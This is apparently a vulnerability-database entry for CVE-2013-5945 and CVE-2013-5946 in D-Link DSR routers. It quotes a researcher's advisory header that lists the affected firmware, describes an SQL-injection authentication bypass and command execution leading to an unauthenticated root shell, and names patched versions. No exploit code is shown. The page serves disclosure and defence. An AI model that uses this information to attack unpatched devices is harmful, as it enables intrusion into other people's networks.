          "value": "CWE-89"
        }
      ],
      "source": "nvd@nist.gov",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2013-5945 (GCVE-0-2013-5945)

Vulnerability from cvelistv5

var-202002-0660

Vulnerability from variot

CVEs:

CVE-2013-5945 - Authentication Bypass by SQL-Injection

CVE-2013-5946 - Privilege Escalation by Arbitrary Command Execution

Vulnerable Routers:

D-Link DSR-150 (Firmware < v1.08B44)

D-Link DSR-150N (Firmware < v1.05B64)

D-Link DSR-250 and DSR-250N (Firmware < v1.08B44)

D-Link DSR-500 and DSR-500N (Firmware < v1.08B77)

D-Link DSR-1000 and DSR-1000N (Firmware < v1.08B77)

Download URL:

http://tsd.dlink.com.tw

Arch:

mips and armv6l, Linux

Author:

0_o -- null_null

nu11.nu11 [at] yahoo.com

Date:

2013-08-18

Purpose:

Get a non-persistent root shell on your D-Link DSR.

Prerequisites:

Network access to the router ports 443 and 23.

!!! NO AUTHENTICATION CREDENTIALS REQUIRED !!!

A list of identified vulns follows. This list is not exhaustive as I assume

more vulns are present that just slipped my attention.

The fact that D-Link implemented a backdoor user (for what reason, please??)

and just renamed it instead of completely removing it after it was targetted

by my previous exploit, as well as the triviality of those vulns I found

makes me suggest that more vulns are present that are comparably easy to

exploit.

Since 2013-12-03, patches are available for:

DSR-150: Firmware v1.08B44

DSR-150N: Firmware v1.05B64

DSR-250 and DSR-250N: Firmware v1.08B44

DSR-500 and DSR-500N: Firmware v1.08B77

DSR-1000 and DSR-1000N: Firmware v1.08B77

via http://tsd.dlink.com.tw

And now, have a worthwhile read :-)

ghsa-h4fc-4px4-xq89

Vulnerability from github

gsd-2013-5945

Vulnerability from gsd

fkie_cve-2013-5945

Vulnerability from fkie_nvd

Tags

Sightings

Nomenclature